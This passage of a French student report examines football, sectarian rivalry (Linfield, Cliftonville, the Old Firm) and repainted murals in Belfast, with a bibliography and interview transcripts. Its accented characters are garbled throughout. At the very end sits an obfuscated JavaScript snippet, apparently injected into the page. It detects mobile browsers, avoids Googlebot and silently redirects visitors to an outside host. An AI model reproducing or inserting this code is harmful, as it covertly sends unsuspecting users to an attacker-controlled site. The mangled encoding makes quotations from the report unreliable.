Une fois ce travail terminA�, nous avons A�tA� forcA�s de constater que le temps sur place A� Belfast nous a fait dA�faut. En effet, nous aurions souhaitA� approcher de plus prA?s le monde du football local, que ce soit en allant assister A� des matchs ou encore en sympathisant avec des membres de clubs de supporters. Lorsque nous avons appris que la plupart des murals de football avaient A�tA�s recouverts, nous aurions aimA� pouvoir dA�couvrir les quelques fresques qui perdurent en plus des photographies que nous avions trouvA� en ligne. Cependant, nous avons compris que le football est un milieu relativement fermA� dans lequel il faut A?tre introduit et pour A?tre amenA�s A� ces peintures il nous aurait fallu rencontrer plus de gens, ce que le manque de temps nous a empA?chA� de faire.

Pour terminer, on nous a fait remarquer qua��aujourda��hui le sport utilisA� pour tenter de rA�concilier les communautA�s A� Belfast est le hockey. En effet, une A�quipe a A�tA� importA�e du Canada et une patinoire a A�tA� construite aprA?s le conflit, ce qui empA?che toute affiliation da��un cA?tA� comme de la��autre.

Bibliographie

Articles ou ouvrages scientifiquesA�:

  • FauchA� S. et al. (2000), Sport et IdentitA�, Paris, L’Harmattan.
  • Garnham N. (2004), Association football and society in pre-partition Ireland, Belfast, Ulster Historical Foundation.
  • McGuirk B. (2009), Celtic FC – The Ireland Connection, Edinburgh, Black & White Publishing Limited.
  • Ramonet I. (1996), a�?Passions nationalesa�?, Quasimodo, octobre 1996, nA�1, p.27-31 [en ligne].A�http://www.revue-quasimodo.org/PDFs/1%20-%20Ramonet%20Sport%20Passion%20Nationalisme.pdfA�(consultA� le 21.05.16)

AutresA�:

  • BBC News, a�?A rivalry tied up in religiona�? A�26 AoA�t 2006 [en ligne].

http://news.bbc.co.uk/2/hi/uk_news/scotland/5289202.stmA�(consultA� le 20.05.16)

  • DelanoA� R., a�?Belfast, une ville coupA�e en quatrea�?, So foot, 31 Janvier 2016, [en ligne].

http://www.sofoot.com/belfast-une-ville-coupee-en-quatre-180026.html (consultA� le 21.05.16)

  • Documentaire rA�alisA� par Vice, Football’s most dangerous rivalry, 2012, [en ligne].

https://www.youtube.com/watch?v=cggTbCcbcNA

(visionnA� le 30.04.16)

http://www.guardian.co.uk/news/2006/mar/14/guardianobituaries.football (consultA� le 20.05.16)

  • Moriarty G., « Northern Ireland football bridges divide after dark days of Troublesa�?, The Irish Times, 9 avril 2016, [en ligne].

http://www.irishtimes.com/news/ireland/irish-news/northern-ireland-football-bridges-divide-after-dark-days-of-troubles-1.2604045

(consultA� le 21.05.16)A�

Annexes: Entretiens et imagesA�(dans la��ordre chronologique)

Entretien nA� 1 avec notre Black Cab Driver, ancien activiste catholique

  1. What about football in Northern Ireland? Do you guys enjoy watching games?

R: Yes we do, you probably don’t know it but actually our national sport is handball. We also have another Irish sport where you play with some kind of bats but only a few play it.

  1. Do you have a favourite club?

R: Actually I do. The Celtics. There was a big diaspora of Irish people that went to Scotland so we kind of look up to that team. We also watch the Northern Ireland games, but the teams are not professional, only semiprofessional. It’s like, you come from a small place but you refer yourself to another big team. Us, the catholic Irish people most often look up to the Celtics of Glasgow.

  1. Ok so there must be a big rivalry between the catholic Irishmen from Glasgow and the protestant Scottish.

R: Yes of course. I don’t know if you have already seen an « Old firms match ». It’s quite impressive. It’s the most important derby to me. It’s like the two teams of Madrid playing against each other but instead of being a difference between the social class of the supporters of each team you can also add a touch of politics and religious rivalry.

  1. We were thinking if there’s something close to that in Belfast. I mean, there’s quite an historic rivalry between two kinds of communities here so is there some derby’s like the « Old firm »?

R: Well, it’s not as impressive but there’s a rivalry between Cliftonville, more Catholic, and Linfield, which is more protestant. Anyway, you can see today that there are more and more Protestants and Catholics playing in a team or the other. I even have a catholic friend whom the grandson is playing for Linfield. The teams are becoming more mixed. On the other hand, the supporters tend to be affiliated to one team because of their beliefs but still accept other players beliefs in their favourite team.

  1. We’re doing our project on murals related to football. Are there some places you can show us about it?

R: Well not really, the Northern Ireland Football association has repainted these murals.

  1. Why have they done that?

R: The war is over. I think it’s better like that. Each side will try to not forget what happened by painting murals, memorials etc. but there’s no point on provocation or something like that.

Entretien nA� 2 A� la rA�ception de la��auberge

La��entretien na��a pas durA� longtemps car notre interlocuteur, un employA� de la��auberge, nous fais savoir qua��il na��est pas du tout familier avec le monde du football.

a�?Je na��aime pas A�a. Mais pas pour des raisons politiques !a�?

En revanche, il nous a proposA� de nous arranger un rendez-vous avec un gA�rant de la��auberge qui, lui, est un supporter.

Entretien nA� 3 avec un serveur da��un bar oA? il y a des diffusions de matchs

Il n’a pas A�normA�ment parlA� de foot. NA�anmoins, il a dit que le football A� Belfast n’A�tait pas trA?s important bien qu’il y ait effectivement des appartenances communautaires dans des A�quipes.

Nous avons demandA� si aujourd’hui il A�tait plutA?t question de politique ou de religion?

« Ce n’est pas que la religion et la culture. La sA�paration spatiale est trA?s importante et A�galement dans d’autres villes ! »

Entretien nA� 4 avec le gA�rant de l’hostel Vagabonds et du Lavery’s

Nous avons A�tA� introduits par l’un des employA�s et ami du gA�rant, nous lui avons demandA� ce qu’il pensait du football A� Belfast.

Il a commencA� par dire qu’il ne connaissait pas grand-chose et que le questionner ne valait pas la peine. Puis il ajoute que la scA?ne footballistique nord-irlandaise n’est pas si importante a��5000 supporters dans Belfast et 15 matchs par annA�e, les gens ont plutA?t tendance A� suivre la premiA?re ligue oA? les A�quipes de Belfast ne jouent pas.

Nous lui avons alors demandA� si on pouvait supposer que les gens auraient plutA?t tendance A� supporter des A�quipes telles que les Celtics de Glasgow ou…Il a alors eu une rA�action de gA?ne et s’est mis en retrait, en disant qua��on ne pouvait pas immA�diatement poser des questions si directes.

On a immA�diatement senti qua��il A�tait rA�ticent A� parler de football avec nous, ce qui nous a amener A� penser qua��il na��A�tait pas si indiffA�rent A� ce sport et aux enjeux identitaires qua��il cristallise. Suite A� sa suggestion d’aller voir l’IFA, nous avons A�galement A�voquA� la��existence du club de supporters non loin de lA�. Il nous a dit qu’il A�tait vendu, que ce n’A�tait plus un club de supporters mais qu’on pourrait A�ventuellement encore en trouver lA�-bas. Puis il a ajoutA� que l’on ferait mieux d’aller tenter da��en discuter dans un bar et de provoquer une bagarre en rigolant.

Entretien nA� 5 avec un supporter de confession catholique (retranscription)

Lors du cocktail organisA� par notre dA�partement, une discussion informelle sa��est engagA�e devant la��hA?tel avec un belfastois qui A�tait lA�:

Nous apprenons que cet homme est un supporter de Clifton Ville, catholique et anti-loyaliste selon ses mots. Nous lui demandons sa��il sa��identifie A� l’A�quipe de la��Irlande du Nord et il nous rA�pond clairement que non. Son petit frA?re a A�tA� sA�lectionnA� pour jouer dans la��A�quipe et na��a pas apprA�ciA� y jouer.

Il y aurait dans la��accord de paix une clause qui dit que les joueurs nord-irlandais catholiques A�peuvent aller jouer dans la��A�quipe de la��Irlande.

Beaucoup da��Irlandais quittent la��Irlande du Nord pour aller rejoindre la rA�publique da��Irlande. Par consA�quent, il y a moins de catholiques que de protestants A� Belfast dA�sormais et les rivalitA�s entre les membres des deux communautA�s, selon lui, ne vont pas en sa��apaisant. Le problA?me se situe dans la maniA?re dont les individus se dA�finissent. Par exemple, un Ecossais se revendiquera comme a�?Scottisha�? dans un premier temps, puis comme faisant partie du royaume de Grande-Bretagne. Il en va de mA?me pour un Gallois. En revanche, en Irlande du Nord, Compte tenu du passA� politique et du caractA?re insulaire du territoire, les protestants – du fait qua��ils ne soient pas rattachA�s au a�?mainlanda�?, les protestants vont immA�diatement se revendiquer comme Britanniques, ce qui fait persister les diffA�rences entre les deux communautA�s et empA?che la crA�ation da��une identitA� nord-irlandaise. Un autre exemple rA�side dans le fait qua��ils na��aient pas leur propre hymne – ils chantent comme les Anglais a�?God Saved the Queena�?. Cela montre encore leur attachement A� la couronne et leur volontA� de ne pas vouloir sa��en dA�faire. De ce fait, une assimilation devient impossible.

Au sein de la��A�quipe qua��il supporte, peu lui importe si un joueur est protestant, car il dissocie sa confession de la��A�quipe dans laquelle il a signA�. Finalement, il reconnaA�t que le joueur fait son travail: marquer pour son A�quipe.

Da��un autre cA?tA�, les supporters se comportent de maniA?re trA?s diffA�rente. Les protestants sont derriA?re Linfield et les catholiques supportent Cliftonville. Il y a des tensions claires entre les deux groupes.

A nouveau la��exemple du a�?Old Firma�? de Glasgow a A�tA� utilisA�, car avec la forte diaspora irlandaise qua��il y a eue en A�cosse, il y a un grand nombre de supporters nord-irlandais et les A�quipes sont plus populaires en comparaison A� celles de Belfast qui ne sont pas en premiA?re division. Cet exemple est criant parce que la ville de Glasgow na��est vraiment pas loin et il montre, presque de maniA?re caricaturale, les rivalitA�s qui persistent entre les deux communautA�s, par la��intermA�diaire des A�quipes des Rangers protestants et des Celtics catholiques.

Entretien nA� 6 Recherche de L’IFA (Irish Football Association) dans la ville et rencontre avec des ouvriers

Nous sommes allA�s A� la recherche de l’IFA. C’est une fois arrivA�s A� l’adresse trouvA�e sur internet que nous avons pu constater que le bureau avait dA�mA�nagA� au stade National situA� au Winsdor Park qui est A�galement le terrain oA? sa��entraA�ne la��A�quipe de Linfield.

Sur place un groupe d’ouvriers curieux nous a demandA� ce qu’on cherchait et nous a indiquA� l’entrA�e des bureaux qui A�tait mal indiquA�e en raison des travaux rA�alisA�s au stade.

Dans le hall, un agent de sA�curitA� nous a accueillis. Nous nous sommes prA�sentA�s et avons demandA� A� voir un reprA�sentant A� qui nous pourrions poser des questions. Il nous a rA�pondu qu’avec les prA�paratifs de l’Euro 2016 une grande partie des employA�s A�taient A� l’A�tranger et que donc personne na��A�tait disponible pour nous rA�pondre. En sortant, les ouvriers nous ont interpellA�s et nous ont demandA� ce qu’on cherchait plus prA�cisA�ment. Nous leur avons rA�pondu qu’on A�tait A�tudiants et qua��on A�tait A�lA� pour analyser la situation post-conflit A� travers le foot. On leur a demandA� s’ils A�taient supporters : deux a�� dont un portait un pull Fc Liverpool a�� sur trois nous ont rA�pondu que oui. Mais aucun ne supporte d’A�quipes locales dans lesquelles le communautarisme est selon eux trop prA�sent. En effet, ce n’est pas uniquement parce que les A�quipes que semi-professionnelles, mais bel et bien A� cause des tensions qui subsistent. Ils ont ajoutA� que lors des matchs un lourd effectif de police est dA�ployA� (environ 400 agents et des vA�hicules anti-A�meutes).

Finalement, nous leur avons demandA� si selon eux le foot avait plutA?t tendance A� rassembler les gens ou A� les sA�parer, sans hA�siter l’un nous rA�pond: « A�a les sA�pare ».

Et quant A� l’A�quipe da��Irlande du Nord ? « Les catholiques ne sont pas du tout supporters de cette A�quipe ».

Images

Image 1 : Jimmy Johnstone Mural, Falls Road, Belfast

source : http://www.inyourpocket.com/belfast/Belfast-Murals_70999f?&page=1#&gid=1&pid=15
source : http://www.inyourpocket.com/belfast/Belfast-Murals_70999f?&page=1#&gid=1&pid=15

Image 2 : For Club and Country, croisement de Broadway et Donegall, Belfast

source : https://extramuralactivity.com/category/red-hand/page/5/
source : https://extramuralactivity.com/category/red-hand/page/5/

Image 3 : Our wee country, au Times Bar sur York Road, Belfast

source : https://extramuralactivity.com/2013/01/05/our-wee-country-2/
source : https://extramuralactivity.com/2013/01/05/our-wee-country-2/

[1] Irish Republican Army, organisation paramilitaire rA�publicaine

[2] Ulster Defense Army, organisation paramilitaire loyaliste

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}